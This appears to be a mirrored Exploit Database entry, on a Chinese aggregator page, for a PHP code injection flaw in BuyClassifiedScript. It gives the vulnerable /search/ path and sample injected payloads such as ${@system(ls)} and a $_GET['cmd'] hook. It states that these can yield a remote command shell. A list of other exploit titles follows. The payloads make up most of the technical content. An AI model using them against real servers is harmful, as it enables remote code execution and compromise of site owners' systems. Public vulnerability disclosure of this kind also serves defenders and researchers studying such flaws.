BuyClassifiedScript – PHP Code Injection

Exploit Database
70 阅读

作者： d3b4g

日期： 2012-11-26
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/22929/

# Exploit Title: buyclassifiedscript PHP code injection vulnerability
# Date: 25.11.201
# Exploit Author: d3b4g
# Vendor Homepage: http://buyclassifiedscript.com/
# Tested on:Windows 7
# Blog: d3b4g.me


 

----------------------------------------------------------------------------------

 This vulnerabilityallows an attacker to inject custom code
 into the server side scripting engine.It's possible to get a remote cmd by taking
 advantage of this vulnerability.
 
 
 Vulnerable function: 

 /search/ 


 () php code excution :


 http://localhost/path/search {Inject malicious code}


 () example of code you can inject:


 //${@system(ls)}

${@print(hello)}

$_GET['cmd']


 //



-end-

last Exploits
BuyClassifiedScript – PHP Code Injection的更多信息

Joomla! Component com_jvideodirect – Directory Traversal：
WordPress Plugin Collision Testimonials 3.0 – SQL Injection：
Zyxel, EMG2926 < V1.00(AAQT.4)b8 - OS Command Injection：
Zen Cart CMS 1.3.9h – Multiple Cross-Site Scripting Vulnerabilities：
PHP Enter 4.1.2 – ‘banners.php’ PHP Code Injection：
OpenBMCS 2.4 – SQLi (Authenticated)：
Huawei B315s-22 – Information Leak：
Judging Management System v1.0 – Authentication Bypass：